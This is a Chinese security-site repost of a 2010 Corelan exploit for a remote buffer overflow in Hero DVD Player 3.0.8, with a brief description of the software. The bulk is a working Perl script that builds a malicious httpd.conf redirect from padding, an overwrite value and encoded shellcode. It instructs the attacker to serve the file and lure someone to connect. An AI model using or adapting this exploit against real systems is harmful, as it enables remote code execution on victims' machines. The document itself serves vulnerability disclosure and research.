Hero DVD Player远程缓冲区溢出Exploit

发布:wpulog | 发布时间: 2010年7月8日

Hero DVD Player(豪杰DVD播放器)是一款DVD播放软件，它有着增强的界面，为你提供更真实的DVD效果。提供绝佳的声色和画面效果，有以下特色：屏幕抓取、背景播放模式、标题处理、短点播放、局部缩放、书签和DSP声效。Hero DVD Player 3.0.8存在一处缓冲区溢出漏洞，可能被攻击者利用远程执行任意代码。

[+]info:
~~~~~~~~~
# Exploit Title : Hero DVD Remote Buffer Overflow Exploit
# Author : chap0 [www.seek-truth.net]
# Software Link : http://download.cnet.com/Hero-DVD-Player/3000-7970_4-10127412.html
# Version : 3.0.8
# OS : Windows XP SP3
# Greetz to : God the Creator, Sud0 (Thanks Bro for the Support)
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-056
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

[+]poc:
~~~~~~~~~

print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[*] Hero DVD Player Remote Exploit by chap0.\n"; 
print "[*] Visit Corelan.be port 8800, Preparing Payload . . .\n";
sleep(3);

my $file = "httpd.conf";

$code = "Redirect permanent /sploit http://";
$junk = "A" x 128;
$more = "yH2X" ; # alpha value for "yH2X" = 0x58324879 from msg723.acm
$nops = "\x42" x 24; #Padding
#message box code
$shell = "TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIN9JKMK9IRTWTL401N2OB2ZVQXISTLKBQ6PLKRVDLLKT65LLKPF5XLKSNWPLKWFWH0OUHRUL3PYEQ8QKOKQSPLKRLGT7TLKQUGLLK645URX5QKZLKQZ28LKPZQ0EQZKKSVW79LKGDLKEQJNVQKOP1IPKLNLK4O03DUZO1HOTM5QYWKYJQKOKOKO7K3LVD18D59NLKPZVDS1JKU6LKTLPKLK1J5L5QZKLK34LKUQKXMYQTWT5L3QHCNRTHGYN4K9KUMYIRE8LNPNTNZLPRKXMLKOKOKOMYPE5TOKSNYHKRBSMW5L14QBKXLKKOKOKOMYQUS83XBLBLGPKOSX6SP2FNE4SXRUT33U3BLHQL14UZLIJFPVKO65TDLIO20POKOXORPMOLMWEL7TPRKX1NKOKOKO3XSBSUD7V8E8BLSQRNW3U8QSRO2RCUVQ9KMXQLWT4KMYM3U82TU8687PSXWPQDRRD5RH0SRESUBK6Q9YLHPL145ZLIM1VQN2F2PSV1PRKOHPP1O060KO0UUXTJA";

open(FILE,">$file");
print FILE $code.$junk.$more.$nops.$shell;
close(FILE);

print "[*] Use Backtrack! place httpd.conf in /etc/apache2/ and start apache.\n";
print "[*] Have Someone Connect to your Server /sploit.\n";

[+]Reference:
~~~~~~~~~
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-056

出自：BugZone - http://www.pulog.org/exploit/1195/Hero-DVD-Player-bof/ 转载必须注明！